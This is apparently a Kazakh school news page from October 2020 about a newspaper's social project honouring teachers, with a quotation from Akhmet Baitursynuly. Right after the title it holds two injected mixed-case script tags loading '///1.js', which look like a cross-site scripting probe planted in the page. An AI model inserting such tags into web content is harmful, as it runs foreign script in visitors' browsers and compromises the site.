Ұлағатты ұстазға, ыстық ықыласпен!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.10.2020
Қазақстан Республикасының Білім және ғылым министрлігінің қолдауымен шығатын «Білімді ел – Образованная страна» республикалық газетінің ұйымдастыруымен «Ұлағатты ұстазға, ыстық ықыласпен!» атты әлеуметтік жоба жүріп жатқаны белгілі. Бұл игілікті бастама бірталай жанның ұстаздарына деген жүрекжарды лебіздерін білдіруіне себепкер болып отыр. Әлеуметтік жобаға біздің де оқу орнымыз, түлектеріміз, студенттеріміздің ата-аналары қатысып, қолдау көрсетіп жатыр. Ұлт ұстазы Ахмет Байтұрсынұлы «Газет – халықтың көзі, құлағы һәм тілі. Адамға көз, құлақ, тіл қандай керек болса, халыққа газет сондай керек» – деп айтқандай, білім беру үрдісі мен өскелең ұрпақты тәрбиелеу ісіндегі келелі мәселелермен, озық ойлармен бөлісуді, әдістемелік жұмысты шыңдауды мақсат еткен республикалық басылымның оқырмандарына жол табуына тілектеспіз.
 
 
 
Просмотров: 488


Пікір қосу



Деректерді қолтаңбаға қосу